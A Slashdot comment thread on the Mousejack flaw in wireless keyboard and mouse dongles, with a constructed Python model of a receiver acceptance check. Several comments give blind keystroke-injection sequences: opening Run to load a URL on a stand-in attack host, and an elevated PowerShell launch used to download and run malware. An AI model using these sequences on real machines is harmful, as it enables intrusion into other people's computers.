Security Bug Wireless Networking

Mousejack Attacks Exploit Wireless Keyboards and Mice (threatpost.com) 112

msm1267 writes: Researchers have discovered a vulnerability in the USB devices that support wireless keyboards and mice that could put a countless number of devices at risk of attack. Seven manufacturers have been informed of the flaw, but as of today, only Logitech has produced a firmware update. Some have no update mechanism and can never be patched. The issue lies in the fact that some of the commands from the peripheral device to the dongle are not encrypted. Most do not authenticate packets and an attacker within close proximity and using a USB transmitting malicious packets over radio frequency can trick the victim's machine into accepting mouse clicks impersonating keystrokes. It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.
  • by Chris Mattern ( 191822 ) on Tuesday February 23, 2016 @02:07PM (#51569209)

    ...is why you should be using bluetooth instead of cheaping out. Saves a USB port, too!

    • by wardrich86 ( 4092007 ) on Tuesday February 23, 2016 @02:18PM (#51569289)

      Saves a USB port, too!

      But you'd need a Bluetooth dongle to get that connection... so you'd still be out a USB port. Not sure of many PCs that come with native Bluetooth support.

      • Dunno. My ~4 year old ASUS motherboard has bluetooth on board.

      • I was assuming a laptop, which almost always has built-in Bluetooth. A desktop with no Bluetooth I'd just use a wire.

        • This is a good point... realistically, why do the wireless keyboard/mouse makers use their own protocol, which is most likely far less secure than something designed by people who know what they are doing? BT is a relatively open protocol that has stood the test of time. Yes, it has had its security issues, but after 10+ years, it is pretty robust, and is definitely good enough, assuming proper pairing with 4-6 digit PINs (and re-pairing happens very infrequently.) If one needs more security, it can be h

          • This is a good point... realistically, why do the wireless keyboard/mouse makers use their own protocol, which is most likely far less secure than something designed by people who know what they are doing? BT is a relatively open protocol that has stood the test of time. Yes, it has had its security issues, but after 10+ years, it is pretty robust, and is definitely good enough, assuming proper pairing with 4-6 digit PINs (and re-pairing happens very infrequently.) If one needs more security, it can be handled at the application layer.

            When I see some mouse or keyboard requiring its own dongle, I move on. If they are too cheap to use an industry standard for their stuff, then I'm suspecting they skimped on security somewhere else.

            I don't know one way or the other, so this is pure speculation, but it may be a cost issue. Some may scoff, but virtually any difference in wholesale / production level quantity costs beyond the trivial usually means one wins overwhelmingly over the other. A case in point ... Firewire chips (the original 400 MHz versions) were about $25 in wholesale / 1000 qty versus USB 1.1 at around $15. FW has significant performance advantages over USB, not the least of which is it is fully self-managing whereas USB req

      • by hondo77 ( 324058 )

        Not sure of many PCs that come with native Bluetooth support.

        Besides iMacs, which have had it for ten years.

      • You have a better chance that your computer already has Bluetooth than it has some random proprietary wireless method.

        • That's true, but I can't see wireless KBM packages coming with bluetooth adapters any time soon... though if they switch to Bluetooth, it might make the dongles more available and possibly cheaper.
      • But you'd need a Bluetooth dongle to get that connection... so you'd still be out a USB port. Not sure of many PCs that come with native Bluetooth support.

        Most laptops, many all-in-ones, and a few desktops have bluetooth built in. Of course, it's usually attached to the USB bus... but not always

    • Comment removed based on user account deletion
      • I thought someone is deploying tools to give rodents hand jobs, and that was terribly odd to be on /.

      • I wish Dell still made the MNY-RAQ-DEL2. I bought four of them when I found a batch of new old stock on eBay.
        • by I4ko ( 695382 )
          and I wish Microsoft still made Microsoft Bluetooth Notebook Mouse 5000 which was about the best mouse I ever used. I do have 3 of them, but recently got a Logitech M535 that is not too bad, but a little bigger than I would like.
    • Or, just use a wired keyboard and mouse. Wireless keyboard on a desk has always seemed particularly ridiculous to me - the thing doesn't need to move, so why is having a cable an issue?

      • Not every user of a "desktop" computer sits in front of a desk; some sit on a bed or couch (HTPC anyone?). Then there are those who just don't like wires for aesthetic reasons.

      • And then there's the %#@%$@ mess on my desktop always getting in the way of the mouse's cable.

      • Wireless keyboard on a desk has always seemed particularly ridiculous to me - the thing doesn't need to move, so why is having a cable an issue?

        But the keyboard does move -- usually to temporarily make room for something else: notepad, snacks, book, body parts. And then the cable invariably trips either the wine glass or the coffee cup. The wireless signals have a better track record of not doing that.

      • Comment removed based on user account deletion
        • I'm the only person in my office that still uses wired keyboard and mouse and I don't find it inconvenient at all. My mug of tea sits between the keyboard and mouse cables and there have been no mishaps.

    • by Aaden42 ( 198257 )

      Used to be the case that the reaction time on non-BT wireless was quicker. It wasn't necessarily cheaping out as the proprietary solution actually provided a benefit. More overhead in the BT protocol meant more lag. Not sure if that's still true with current BT hardware/software stacks.

      Not something you'd notice typing in the office, but gamers...

      • by tlhIngan ( 30335 )

        Used to be the case that the reaction time on non-BT wireless was quicker. It wasn't necessarily cheaping out as the proprietary solution actually provided a benefit. More overhead in the BT protocol meant more lag. Not sure if that's still true with current BT hardware/software stacks.

        Not something you'd notice typing in the office, but gamers...

        The other problem I had with Bluetooth is stuck keys or sticky keys caused by flaky signals. I used to use an Apple Bluetooth keyboard with my Mac Mini. It worked,

        • by KGIII ( 973947 )

          I know this is gonna sound strange, but when it comes to input devices like keyboards and mice, I've had really good luck with Microsoft. I dunno who's making 'em or if they're just rebadged OEM stuff but they're pretty good. I noticed quite by accident and not entirely intentionally. They're good enough that I've stuck with 'em for a long time and have been really happy given the times I've had to use other products.

          • by Aaden42 ( 198257 )
            Not strange... I've got MS keyboards plugged into both of my Macs. Feels like ordering a Coke & Pepsi cocktail, but they're decent keyboards. Still holding out hope for finding a decent clicky microswitch (like IBM XT period keyboards) that has an ergonomic split and doesn't cost my first born, but until then... MS keyboards, Logitech mice.
  • by Anonymous Coward

    Pick one.

    Security is always a trade-off, where you decide how determined your attacker is going to be, and weigh that against convenience.

    If you're choosing wireless peripherals, you are leaning so far toward the "convenient" that you're wasting your time if you think any other security measures can make up for it.

  • No way (Score:5, Funny)

    by the_skywise ( 189793 ) on Tuesday February 23, 2016 @02:11PM (#51569239)

    There's no way my wireless keyboard could ever be hacked in this fashion beca I MADE $125,000 YEAR BY USING THESE SIMPLE STEPS - CLICK HERE TO LEARN MORE http://888999444333.ze/?bypass... [888999444333.ze]

    • DING! WINNER! Internet won! Time to go home everyone, we're done for the day!

    • Silly person -- using a keyboard that &$*#@78g9789%^&#$%^&@$# -- wait, switching to my wired keyboard now. Using a keyboard that can be hijacked like that.

      Hold on, my malfunctioning wireless keyboard is blinking something on the LEDs -- S-I-G-N-A-L-J-A-M-M-E-D-N-O-C-A-R-R ...

    • by KGIII ( 973947 )

      Ah, one of my favorite quotes is from a buddy of mine who had lived in the Deep South... "I ain't never scared."

      Your link doesn't resolve. Yes, yes I did click it. I figured someone had to.

  • Just how much of a risk is there to this exploit?

    "A Logitech spokesman told the MIT Technology Review that the company has a software update to fix the issue, but that the vulnerability Bastille detected “would be complex to replicate” since it requires being physically close to the victim, which makes it “a difficult and unlikely path of attack.”"

    It seems to me that you would have to be fairly close to the system that you are attacking as the USB plug doesn't have a lot of power or r

    • Just how much of a risk is there to this exploit?

      How much of a potential reward is there?

      Things like this usually show it's technically feasible, even if impractical. But if the payoff is high enough, it's probably worth someone doing.

      Today's "too difficult to replicate" can easily become "tomorrow's hack in the wild". But if someone sees enough possible payoff for doing it, it's just one more thing.

      And it seems there's always someone looking to exploit anything just because it's there.

      • by dbIII ( 701233 )
        With credit card details entered via keyboard the reward could be enormous.
        With such an obvious motive I have zero sympathy for the utter losers that rushed their product out the door with inadequate security. The products are not fit for the purpose they are designed for.
        • With such an obvious motive I have zero sympathy for the utter losers that rushed their product out the door with inadequate security.

          Of course, the problem with that is that the "losers that rushed their product out the door with inadequate security" aren't the people we need to feel sorry for in this case ... like every other piece of shit consumer technology with non-existent security, it's the consumer who suffers.

          Put the makers of this tech on the hook for paying damages, or throw the CEOs in jail .. t

    • Just how much of a risk is there to this exploit?

      The answer is "enough." I can't imagine coming under this kind of attack myself, but it should be cause enough for a targetable company that deals with sensitive (valuable) data to think twice about rolling out wireless keyboards/mice.

      it requires being physically close to the victim['s computer]

      which could be on the other side of a locked door, or a (fairly thin) wall, or a floor...

    • by Fencepost ( 107992 ) on Tuesday February 23, 2016 @03:36PM (#51569919) Journal
      The risk from this could actually turn out to be really high - perhaps not to any individual system, but to an office environment. TFA includes "100 meters" and "a $15 USB dongle and 15 lines of Python code" which I could believe.

      The issue is that if this can be a broadcast attack, it doesn't need to be successful any more than hacking an ad network needs 100% infection rates - if I can drive up outside a multi-story office building with a cheap adapter at the end of a USB extension cable (and perhaps an appropriate dish) and broadcast "Win-R http://attacksite.site/<Enter>", how many of the PCs in window offices will load that site which loads various exploits based on detection of the browser? This is even better than spearphishing because I don't have to worry about getting through email filters, and if I manage it right I know what company/companies I targeted at what time along with my trojan access to one or more computers within those offices.

      Remember, this is injection of events, not 2-way communication. There's no handshaking or anything else.

      I'm going to be keeping track of this and probably pushing some customers to eliminate or at least replace some cordless equipment - that was an agenda item before, but this can make it a high-priority agenda item.
  • Load malware? (Score:2, Insightful)

    by Cigaes ( 714444 )

    “It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.”

    Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?

    For a particular target, a way can probably be devised, but it will most likely be slow and visible. And not work with the next target.

    Injecting keys is clearly a security flaw with severe consequences, but over-hyping it is unproductive.

    • Re:Load malware? (Score:4, Informative)

      by wonkey_monkey ( 2592601 ) on Tuesday February 23, 2016 @03:25PM (#51569835) Homepage

      Really? With just keystrokes and mouse moves?

      Yup. Actually, just keystrokes - the summary's a bit confused on the subject, but the article says nothing about spoofing mouse moves and clicks - it does, however, say that in some cases an attacker can impersonate the mouse but use it to send keypress packets (the keyboards in question encrypt these, but the receiver accepts them unencrypted from the "mouse").

      but it will most likely be slow and visible

      Not necessarily. What if you want access to a computer you can see through a window (and verify that no-one is near), but is behind a locked door? Even if you can't see the screen, sending Win+R c m d [enter] and so on seems fairly doable.
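
Added example (not part of any comment or of the article): a constructed model of the receiver-side acceptance check described in the comment above, with the flawed policy beside a stricter one. The frame fields, radio addresses, keys and the HMAC tag scheme are assumptions made for illustration, not any vendor's protocol.

```python
import hashlib
import hmac
from dataclasses import dataclass

KEYPRESS, MOVE = "keypress", "move"


@dataclass
class Frame:               # hypothetical over-the-air frame
    address: int           # radio address the frame claims to come from
    kind: str              # KEYPRESS or MOVE
    payload: bytes
    counter: int = 0
    tag: bytes = b""       # empty means sent in the clear, unauthenticated


@dataclass
class Paired:              # what the dongle stored at pairing time
    role: str              # "keyboard" or "mouse"
    key: bytes             # per-device key (constructed sample value)
    last_counter: int = 0


def make_tag(key: bytes, f: Frame) -> bytes:
    msg = f.kind.encode() + f.counter.to_bytes(4, "big") + f.payload
    return hmac.new(key, msg, hashlib.sha256).digest()[:8]


def weak_accept(paired: dict, f: Frame) -> bool:
    """Flawed policy: only keyboard addresses are held to the crypto check."""
    dev = paired.get(f.address)
    if dev is None:
        return False
    if dev.role == "keyboard":
        return hmac.compare_digest(f.tag, make_tag(dev.key, f))
    return True  # mouse address: any frame kind passes, keypresses included


def strict_accept(paired: dict, f: Frame) -> bool:
    """Stricter policy: role check, authentication and replay check on every frame."""
    dev = paired.get(f.address)
    if dev is None:
        return False
    if f.kind == KEYPRESS and dev.role != "keyboard":
        return False  # a mouse has no business sending keypresses
    if not hmac.compare_digest(f.tag, make_tag(dev.key, f)):
        return False  # missing or wrong tag
    if f.counter <= dev.last_counter:
        return False  # replayed or stale frame
    dev.last_counter = f.counter
    return True


def demo() -> dict:
    # Constructed pairing table and frames.
    paired = {0xA1: Paired("keyboard", b"kb-key"), 0xB2: Paired("mouse", b"ms-key")}
    kb = Frame(0xA1, KEYPRESS, b"\x04", counter=1)
    kb.tag = make_tag(b"kb-key", kb)
    mv = Frame(0xB2, MOVE, b"\x01\x02", counter=1)
    mv.tag = make_tag(b"ms-key", mv)
    forged = Frame(0xB2, KEYPRESS, b"\x04")  # cleartext, claims the mouse address
    cases = [("keyboard keypress, valid tag", kb),
             ("cleartext keypress on mouse address", forged),
             ("mouse move, valid tag", mv),
             ("replayed keyboard frame", kb)]
    return {label: (weak_accept(paired, f), strict_accept(paired, f))
            for label, f in cases}


if __name__ == "__main__":
    for label, (weak, strict) in demo().items():
        print(f"{label:38s} weak={weak!s:5} strict={strict}")
```
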

    • Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?

      start-button->cmd->ftp(malware site & file)->execute downloaded malicious file.

      as long as the start button isn't actually up when you do it, it should have a reasonable chance of success.

      • by Cigaes ( 714444 )

        What's a “start button”? :-

        And to wonkey_monkey: what would “òcmd” achieve? “ò” is the character that XTerm generates with win-R.

        To achieve anything, you need either feedback (“see through a window”) or strong assumptions about the user interface currently running.

        • What's a “start button”?

          The button that typically has the picture of a window on it.

          start->R gives you the ability to execute a command via type interface on windows. Use it to spawn a CLI shell. use CLI shell to write a script that spawns a process that downloads & executes the malware.

          Yes, it's operating system specific. So freaking what? So isn't the malware I'm going to attempt to load. There's not enough linux users out there to matter, as the AC mentions. Crackers, like terrorists, like to target soft targets.

          • testing with my Mint install: Alt-F2 instead, then gnome-terminal.
            or start button ->terminal
            both bring up a command prompt, which will allow you to (depending on settings) download and execute a file.

            assuming they're not stupid enough to run as root, they're at least limited to the user's rights unless an exploit exists; getting code to execute on the target machine is 90% of the work.

    • Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?

      On Windows, sure:

      Win-R
      "powershell" + Enter
      "start-process powershell -verb runas" + Enter
      one left-arrow key
      Enter

      This should work on practically any Windows install that includes PowerShell and is at a live desktop. You're now at an admin shell from which you can download whatever you want and run it. As you mentioned, all of this activity will be visible, but if you're away from the keyb
      • by Cigaes ( 714444 )

        So it works in certain cases with a lot of assumptions. Exactly what I was saying.

        • You asked for keystrokes/mouse moves only, with no feedback about where they went. I provided a practical example that will work for a lot of machines, that's all.
        • So it works in certain cases with a lot of assumptions. Exactly what I was saying.

          Where "certain cases with a lot of assumptions" equals "a computer running a recent version of Windows". I'm guessing that there might be a few of those out there.

          • by KGIII ( 973947 )

            The terminal is *usually* mapped to CTRL + ALT + T with *most* distros that I've actually dug into. I've noticed one that didn't do that, I think I've made it so it *does* do that on that VM. I can dig it back out. I didn't check it on all of 'em nor have I tried all of 'em. I'm pretty sure that if I can get that close to the device, I can take a minute to figure out what the OS is. Hell, I can probably find the layout and then write a shim and mirror it over a replicated desktop and map mouse movements, al

          • Where "certain cases with a lot of assumptions" equals "a computer running a recent version of Windows"

            And where "recent" equals "any version released in the last 10 years".
    • by txmason ( 882110 )

      “It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.”

      Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?

      Win-R -> http://www.malicious-site.com/ [malicious-site.com] -> flash exploit (or whatever)

      matter of seconds.

    • "With no feedback about where the keystrokes and clicks end up?"

      I'm guessing most OSes have a hot key to access the menu, from there you can start an appropriate terminal using just keystrokes, and once in a terminal, well.... it's open slather. Don't dismiss what can be done with just keystrokes.

      • by Cigaes ( 714444 )
        But “most OSes have” is not commutative: for most OSes, there may be a key, but there is no single key common to all OSes and user environment. So basically, without feedback, you can expect to take over microsoft's gaming environment, nothing more. There are bigger security holes in it.
        • "without feedback"

          Except you do get feedback... whether your OS-specific exploit worked or not. If it does work, then the target is using that exploit. If not, try an exploit specific to a *different* OS. Start off just trying to ping a known address where you are logging, and note which stage gives you a ping that actually shows up in the log. Once you have identified the OS then you can get on with the real payload.

    • by dbIII ( 701233 )

      Really? With just keystrokes and mouse moves?

      Yes. Keyboard shortcut to launch browser then URL.

      With no feedback about where the keystrokes and clicks end up?

      If you order it to download your rootkit or whatever you can get feedback from wherever you have hosted your little bit of nastiness to tell you that it has been picked up.

    • Re:Load malware? (Score:4, Informative)

      by complete loony ( 663508 ) <Jeremy.Lakeman@nOSpaM.gmail.com> on Wednesday February 24, 2016 @04:37AM (#51573617)
      Hack a computer just by typing? Absolutely [trustedsec.com].
      • by Cigaes ( 714444 )

        Yes, just typing, and in a matter of seconds. Just typing: no seeing what you type, no knowing the keyboard layout, no knowing the user interface running, nothing except keys blindly. As was already pointed out by numerous persons before you posted your duplicated comment, this would work on lusers computers left to the default values. A rather costly attack (requires hardware and physical presence) that can only work generically on the most worthless of targets. Not really worrying. (Of course, for targete

        • Don't need to know the keyboard layout. Only need to guess that it's a Windows machine that is unlocked. You could also move the mouse or perhaps press the scroll-lock key occasionally to prevent the screen saver from automatically starting.

          Unlike most of the other responses that I scanned through at the time, which required a browser exploit, or ftp access. This approach could be used to run arbitrary code without the assistance of a 3rd party server, or a known browser exploit. It only depended on Win+R,

          • by Cigaes ( 714444 )

            Two mistakes in your message:

            “Don't need to know the keyboard layout”: how do you type the ‘m’ in “cmd” on an AZERTY keyboard?

            “Arbitrary code”: no, only code that is already present on the computer. Typing binaries with just the keyboard and generic software is tricky.

            • We're talking about a targeted attack that requires local (-ish) access. Firstly you can probably assume the target has a locale appropriate to their location. However that isn't required, as a USB HID device can send raw 16-bit unicode.

              Did you really read that link?

              # our hex binary
              shell_exec = "4d5a90000300000004000....

              That's a hex dump of a PE .exe file. They then type a powershell script to convert it to binary. That's arbitrary code right there. Unless you have gone to unusual lengths to prevent the launching of an .exe.

  • mouse clicks impersonating keystrokes.

    The article is clearer on what this is supposed to mean:

    An attacker can impersonate the mouse but transmit keypress-packets

  • Say goodbye Microsoft keyboard and mouse. Glad I had a spare :-/

    Affected devices [bastille.net]

  • Searching for a new keyboard on Amazon and seeing all the existing USB keyboards being sold with this vulnerability really pisses me off. It's some major fucking fraud to keep selling a product with this vulnerability.
  • As of 13:35 Pacific time, the updated Logitech firmware doesn't seem to be actually downloadable.

    It's nice of Logitech to develop such software, but they actually have to publish it for it to make a difference.

    (Tried both my OSX and Windows 7 machines, the Logitech Unify software says no updates available, nothing but questions on their forum)

  • So where's this Logitech firmware update? I searched their website, looked at the downloads offered for my mouse (MX Master), and there isn't a firmware update utility. Checked all OSes.

    I wish I could use just bluetooth with it instead of the dongle, but Ubuntu 14.04 doesn't seem to work with it with bluetooth... My chromebook on the other hand works flawlessly.

  • by Anonymous Coward

    Here ya go...
    https://forums.logitech.com/t5... [logitech.com]

  • by eth1 ( 94901 ) on Tuesday February 23, 2016 @05:17PM (#51570649)

    I worked as a one-man IT dept for a small private school for a few years. Someone donated a bunch of wireless keyboard/mouse sets one year, which were used by several of the teachers (without my involvement).

    Shortly afterwards, I started getting odd "OMG, my computer is infected" reports. Mouses were moving on their own, and random typing was appearing out of nowhere.

    The ethernet jacks were usually on shared walls, which resulted in PCs ending up on opposite sides of the same wall (only 2-3 feet apart). Since the devices only had three channels, several of these pairs had ended up on the same one, with hilarity ensuing. :)

  • Could this hack be reversed, i.e., log keystrokes from a wireless keyboard? That sounds substantially more dangerous and more useful to a hacker than sending keystrokes. I've always been wary of wireless keyboards for this reason, but mice are pretty much a non-issue if their data could be captured. Mouse data sending is probably just as useless.

  • by Anonymous Coward

    Here's the official statement from Logitech.

    The post:
    http://forums.logitech.com/t5/Mice-and-Pointing-Devices/Logitech-Response-to-Unifying-Receiver-Research-Findings/m-p/1493878/thread-id/73186

    The file
    http://logt.ly/0222
    DL the linked file, run it (it will not really do anything that you can see) then try updating the firmware thru the Unifying software. It is all in the post

    I installed this and it breaks a few things in the software, like displaying variables instead of the text in the update options, but i

  • Not only do wireless keyboards and mice (regardless of technology) chew through batteries but they are also vulnerable to attacks? Glad I am not using them on my PC then (Logitech K120 keyboard and Gigabyte GM-M6580 laser mouse)

    • Not only do wireless keyboards and mice (regardless of technology) chew through batteries but they are also vulnerable to attacks?

      I have to replace the batteries in my BT keyboard about every six months. My BT mouse is still on its original set, two years later.
